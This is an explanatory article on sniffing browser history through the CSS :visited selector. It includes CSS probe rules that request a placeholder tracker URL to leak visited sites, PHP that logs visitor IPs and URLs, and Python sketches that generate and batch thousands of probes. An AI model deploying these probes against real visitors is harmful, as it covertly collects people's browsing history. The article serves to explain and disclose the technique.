Sniffing Browser History with CSS

It may sound strange, but basic logic in CSS (Cascading Style Sheets) can be used to ask a browser whether a visitor has been to another web page. More generally, this shows that even simple logic in a technology can be exploited. The data in this example may seem unimportant, but once it is used to profile a user’s likes and dislikes, for example, it quickly turns from “data” into personal information.

 

The CSS Logic

Fundamentally, this PoC relies on pure CSS. Take, for example, the following CSS…

#link1 {
color: blue;
}
#link1:visited {
color: red;
}

…applied to this:

<a id="link1" href="http://google.com/">Visit Google!</a>

From the above, you can deduce that “Visit Google!” shows up blue by default. The exception is when the visitor has already visited http://google.com/, in which case the link shows up red. Seems innocent enough, right?

Consider, instead, this:

#link1 {
color: blue;
}
#link1:visited {
color: red;
background: url(http://trackersite.ext/track.php?url=google.com);
}

<a id="link1" href="http://google.com/">Visit Google!</a>

As before, the link shows up blue by default and red if the user has visited http://google.com/. This time, however, the visited state also specifies a background image for the link. To display that image, the browser has to request it from the server, and in doing so it innocently sends additional information along with the request: ?url=google.com. Because the request is only made when the :visited rule matches, its arrival tells the server that this visitor has been to google.com.
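To make the leak concrete, here is a minimal Python sketch of what a tracking server could recover from the requested address. The helper name leaked_site is hypothetical and not part of the original PoC; it relies only on the standard library's urllib.parse.

```python
from typing import Optional
from urllib.parse import parse_qs, urlsplit


def leaked_site(request_url: str) -> Optional[str]:
    """Return the value of the `url` query parameter, or None if it is absent."""
    query = urlsplit(request_url).query
    values = parse_qs(query).get("url")
    return values[0] if values else None


# The background-image request from the example above.
print(leaked_site("http://trackersite.ext/track.php?url=google.com"))  # prints google.com
```

The server never needs to see the page itself: the query string alone names the site.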

The Server Side Code

You have probably noticed that the background image doesn’t point to an actual image file (.png, .gif, etc.). Instead, it loads a PHP script. This script has the potential to log the sites a user has visited. Consider the following PHP:

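<?php
/* ... */ // setup elided in the original; $pdo is assumed to be a PDO connection created here
$ip = $_SERVER["REMOTE_ADDR"]; // the user's IP address
$url = $_GET["url"] ?? ""; // the URL they have visited (empty if the parameter is missing)

// log the information in the database table
// (a prepared statement replaces the mysql_* functions, which were removed in PHP 7)
$stmt = $pdo->prepare("INSERT INTO trackdb.log (ip, url) VALUES (?, ?)");
$stmt->execute([$ip, $url]);
?>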
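For readers who want to try the logging step without a PHP and MySQL setup, the same idea can be sketched in Python. This is only an illustration under stated assumptions: an in-memory SQLite database stands in for the trackdb.log table, and the function names open_log and log_visit are made up for this example.

```python
import sqlite3


def open_log() -> sqlite3.Connection:
    """Create an in-memory database with a table shaped like the article's log table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE log (ip TEXT, url TEXT)")
    return conn


def log_visit(conn: sqlite3.Connection, ip: str, url: str) -> None:
    """Record one (ip, url) pair; placeholders keep the values out of the SQL text."""
    conn.execute("INSERT INTO log (ip, url) VALUES (?, ?)", (ip, url))
    conn.commit()


conn = open_log()
log_visit(conn, "203.0.113.7", "google.com")  # example IP from a documentation range
print(conn.execute("SELECT ip, url FROM log").fetchall())
```

Each request for the fake background image would result in one such row.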

Querying the browser…

Now that we know how to query the browser for one link, we can do it for many links:

#link1:visited {
background: url(http://trackersite.ext/track.php?url=google.com);
}
#link2:visited {
background: url(http://trackersite.ext/track.php?url=yahoo.com);
}
#link3:visited {
background: url(http://trackersite.ext/track.php?url=amazon.com);
}
#link4:visited {
background: url(http://trackersite.ext/track.php?url=php.net);
}
/* etc */

<a id="link1" href="http://google.com/">a</a>
<a id="link2" href="http://yahoo.com/">a</a>
<a id="link3" href="http://amazon.com/">a</a>
<a id="link4" href="http://php.net/">a</a>
<!-- etc -->

And it’s that easy! Just put thousands of links in, and you have the ability to find hundreds of pages that a user has visited.
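Nobody would write thousands of rules by hand. As a rough sketch, the CSS and the matching links could be generated from a list of domains. The function name build_probe is hypothetical; the tracker address is the placeholder used throughout this article.

```python
from typing import Iterable, Tuple
from urllib.parse import quote

TRACKER = "http://trackersite.ext/track.php"  # placeholder address from the article


def build_probe(domains: Iterable[str]) -> Tuple[str, str]:
    """Return (css, html): one :visited rule and one anchor per domain."""
    css_rules = []
    anchors = []
    for i, domain in enumerate(domains, start=1):
        css_rules.append(
            f"#link{i}:visited {{\n"
            f"background: url({TRACKER}?url={quote(domain, safe='')});\n"
            f"}}"
        )
        anchors.append(f'<a id="link{i}" href="http://{domain}/">a</a>')
    return "\n".join(css_rules), "\n".join(anchors)


css, html = build_probe(["google.com", "yahoo.com", "amazon.com", "php.net"])
print(css)
print(html)
```

Run as written, this reproduces the four rules and four links shown above.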

To check thousands of links, the PoC uses publicly available data from Alexa and the Yahoo! API.

First, it scans for website homepages, as provided by Alexa: http://google.com/, http://yahoo.com/, http://msn.com/, etc. Any homepage the browser reports as visited is logged on the server.

Second, it scans for individual site pages, such as http://google.com/cookies.html, http://google.com/adsense/, http://yahoo.com/uk/, etc. It will only scan a site’s pages if the site’s homepage was visited (i.e., http://google.com/cookies.html will not be queried if http://google.com/ was not visited). To get the list of a site’s pages, it simply does a site:domain.ext query via the Yahoo! API.
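The two-pass rule can be sketched in a few lines of Python. The name second_pass_targets and the pages_by_site dictionary are assumptions for illustration; in the PoC the page lists would come from the site: queries described above, which are not reproduced here.

```python
from typing import Dict, Iterable, List


def second_pass_targets(
    visited_homepages: Iterable[str],
    pages_by_site: Dict[str, List[str]],
) -> List[str]:
    """Return the inner pages to probe, limited to sites whose homepage was visited."""
    visited = set(visited_homepages)
    targets: List[str] = []
    for site, pages in pages_by_site.items():
        if site in visited:  # skip sites the first pass did not detect
            targets.extend(pages)
    return targets


# Hypothetical page lists, using the example URLs from the text.
pages_by_site = {
    "http://google.com/": ["http://google.com/cookies.html", "http://google.com/adsense/"],
    "http://yahoo.com/": ["http://yahoo.com/uk/"],
}
print(second_pass_targets(["http://google.com/"], pages_by_site))
```

Here only the two google.com pages are queued, because yahoo.com's homepage was not detected in the first pass.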

Because it can, in theory, detect 40 million pages, the PoC queries in “batch mode”: it might check 2,000 pages, then use a META refresh to load and scan the next 2,000, and so on.
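A minimal sketch of the batching idea, assuming a batch size of 2,000 as in the text. The names batches and meta_refresh, and the scan.php?batch= address, are hypothetical and only illustrate how one page could hand over to the next.

```python
from itertools import islice
from typing import Iterable, Iterator, List


def batches(urls: Iterable[str], size: int = 2000) -> Iterator[List[str]]:
    """Yield consecutive lists of at most `size` URLs."""
    it = iter(urls)
    while True:
        chunk = list(islice(it, size))
        if not chunk:
            return
        yield chunk


def meta_refresh(next_batch: int, delay_seconds: int = 0) -> str:
    """Build a META refresh tag pointing at the next batch (hypothetical URL scheme)."""
    return (
        f'<meta http-equiv="refresh" '
        f'content="{delay_seconds}; url=scan.php?batch={next_batch}">'
    )


urls = [f"http://example.com/page{i}" for i in range(5000)]
sizes = [len(chunk) for chunk in batches(urls)]
print(sizes)  # prints [2000, 2000, 1000]
print(meta_refresh(next_batch=2))
```

At 2,000 links per page, covering all 40 million pages would take 20,000 page loads.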

It could also use AJAX (JavaScript) to load each list of links, rather than relying on iframes and page refreshes.

The Implications

This exploit could currently be used to track website visitors’ likes and dislikes, which could in turn be used to display advertisements targeted at the user. For example, if you know a user has been visiting car-related web pages, you could display an advert for cars, which is likely to get a higher CTR (click-through rate) than an advert for gardening equipment (unless they have also visited gardening-related sites).

Naturally, many people will consider this information personal when it is used in this way, and will be concerned about how the data is, and could be, used. Browsers and plugins are likely to reduce the effect of this exploit. (Firefox will be coming with an option to disable the :visited selector.)
